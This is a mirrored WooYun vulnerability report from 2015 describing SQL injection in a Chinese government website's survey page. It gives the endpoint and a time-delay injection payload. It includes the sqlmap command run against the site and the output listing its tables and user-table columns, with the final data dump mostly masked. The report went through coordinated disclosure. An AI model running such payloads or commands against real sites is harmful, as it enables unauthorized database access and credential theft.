乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-04: 细节已通知厂商并且等待厂商处理中 2015-03-09: 厂商已经确认,细节仅向厂商公开 2015-03-19: 细节向核心白帽子及相关领域专家公开 2015-03-29: 细节向普通白帽子公开 2015-04-08: 细节向实习白帽子公开 2015-04-18: 细节向公众公开
注射
http://www.symzj.gov.cn/symz/wsdc.jsppost数据:dc=3%3b%20waitfor%20delay%20%270%3a0%3a3.058%27%20--%20
sqlmap.py -u "http://www.symzj.gov.cn/symz/wsdc.jsp" --data "dc=3" --level 3 --dbs
43 dbo.comd_list dbo.dtest dbo.dtproperties dbo.fc_result dbo.jc_download dbo.jc_upload dbo.jc_users dbo.mj_2005_1a dbo.mj_2005_1b dbo.mj_2005_2a dbo.mj_2005_2b dbo.mj_2005_3a dbo.mj_2005_3b dbo.mj_2005_4a dbo.mj_2005_4b dbo.mj_2005_5a dbo.mj_2005_5b dbo.mj_2005_6a dbo.mj_2005_7a dbo.mj_2005_8a
Database: symzTable: dbo.jc_users[179 columns]+-------------------------------------+-------------+| Column | Type |+-------------------------------------+-------------+| abfrsql | non-numeric || address_id | non-numeric || adminemail | non-numeric || adminid | non-numeric || administrators | non-numeric || adminpass | non-numeric || adminpassword | non-numeric || adminpaw | non-numeric || album_id | non-numeric || alias | non-numeric || alias_area_id | non-numeric || allowpostannounce | non-numeric || allowrefund | non-numeric || ana_codice | non-numeric || apply | non-numeric || apwd | non-numeric || area_id | non-numeric || authentification | non-numeric || authentifier | non-numeric || avp_codigo | non-numeric || bloc_row | non-numeric || bn_id | non-numeric || bsur_id | non-numeric || callstart | non-numeric || cardid | non-numeric || categories | non-numeric || class_id | non-numeric || cleanurl | non-numeric || clef | non-numeric || cod_aplicacion | non-numeric || codeid | non-numeric || codi | non-numeric || comment5 | non-numeric || commentpath | non-numeric || complet | non-numeric || conkey | non-numeric || consommateur | non-numeric || corso | non-numeric || cp_id | non-numeric || csv_id | non-numeric || dataricovero | non-numeric || deliv_id | non-numeric || dept_number | non-numeric || derived_id | non-numeric || descr | non-numeric || desd_xfase | non-numeric || disma | non-numeric || disp_name | non-numeric || domicilio_id | non-numeric || editionnumber | non-numeric || eid | non-numeric || email | non-numeric || emer | non-numeric || emri | non-numeric || fieldid | non-numeric || file | non-numeric || file5 | non-numeric || fjalekalimi | non-numeric || fjalekalimin | non-numeric || fre_codigo | non-numeric || help | non-numeric || hid | non-numeric || host | numeric || id_auteur | non-numeric || id_estado | non-numeric || id_fatura | non-numeric || id_links | non-numeric || id_log | non-numeric || id_message | non-numeric || id_syndic_article | non-numeric || idextra | non-numeric || idlocation | non-numeric || indice_id | non-numeric || indirizzo | non-numeric || investigator_id | non-numeric || item | non-numeric || jfalternative | non-numeric || jfcontent | non-numeric || jfrouter | non-numeric || jfsections | non-numeric || job_e_date | non-numeric || lake_id | non-numeric || last_login | non-numeric || lastposter | non-numeric || lasttid | numeric || lname | numeric || localita | non-numeric || login_pass | non-numeric || login_passwd | non-numeric || login_password | non-numeric || login_pwd | numeric || loginkey | non-numeric || loginpas | non-numeric || loginpass | non-numeric || loginpasswd | non-numeric || loginpwd | non-numeric || luogoid | non-numeric || main2 | non-numeric || manuscriptid | non-numeric || meetingid | non-numeric || menutype | non-numeric || meta_id | non-numeric || mod_arcadebtn | non-numeric || mod_donimedia_select_box_menu_type1 | non-numeric || mod_freeway_services | non-numeric || mod_gtranslate | non-numeric || mod_jumplink | non-numeric || module_addr | non-numeric || mountname | non-numeric || n_client | non-numeric || n_id | non-numeric || newpms | non-numeric || newrow | non-numeric || newyork | non-numeric || nroordine | non-numeric || object_sub_class_id | non-numeric || oggettistica | non-numeric || online_id | non-numeric || pass_w | non-numeric || pass_word | non-numeric || passw | non-numeric || perdoruesi | non-numeric || person_id | non-numeric || php_dir | non-numeric || pid2 | non-numeric || pl | non-numeric || point | non-numeric || post_status | non-numeric || postdatetime | non-numeric || prc_sconto1 | non-numeric || prc_sconto4 | non-numeric || privmsgs_id | non-numeric || privmsgs_text_id | non-numeric || prune_id | non-numeric || prz_merce_fis | non-numeric || published | non-numeric || publisher | non-numeric || pw | non-numeric || qname | non-numeric || rating_id | non-numeric || ref_url | non-numeric || relationsub | non-numeric || repid | non-numeric || risultato | non-numeric || rpad | non-numeric || schlusselwort | non-numeric || secret | non-numeric || secret_code | non-numeric || secretcode | non-numeric || sheight | non-numeric || situacao_id | non-numeric || sklep1 | non-numeric || startnummer | non-numeric || stat_name | non-numeric || stock | non-numeric || sub_comment1 | non-numeric || sub_large_image1 | non-numeric || tax_rate_id | non-numeric || ticket_id | non-numeric || titleid | non-numeric || touche | non-numeric || usager | non-numeric || user_password | non-numeric || user_pw | non-numeric || user_usern | non-numeric || users | non-numeric || usr_pass | non-numeric || usrnm | non-numeric || usrpass | non-numeric || utenteid | non-numeric || utilisateur | non-numeric || ver_codice | non-numeric || virtuemart | non-numeric || vote_id | non-numeric || vtyp_id | non-numeric || waiting_list_id | non-numeric || word_text | non-numeric || yhm | non-numeric || you | non-numeric |+-------------------------------------+-------------+
Database: symzTable: dbo.jc_users[9 columns]+----------+---------+| Column | Type |+----------+---------+| fzr_name | varchar || gl_id | int || id | int || level | varchar || link | varchar || name | varchar || password | varchar || state | varchar || username | varchar |+----------+---------+
*****ode**********e: s**********o.jc_**********trie**********------------********** **********------------**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********ba59abbe56e0**********------------**********cod*****
你们都懂的!!!!
危害等级:高
漏洞Rank:11
确认时间:2015-03-09 10:43
CNVD确认所述情况,已经转由CNCERT下发给分中心,由其后续协调网站管理单位处置。
暂无
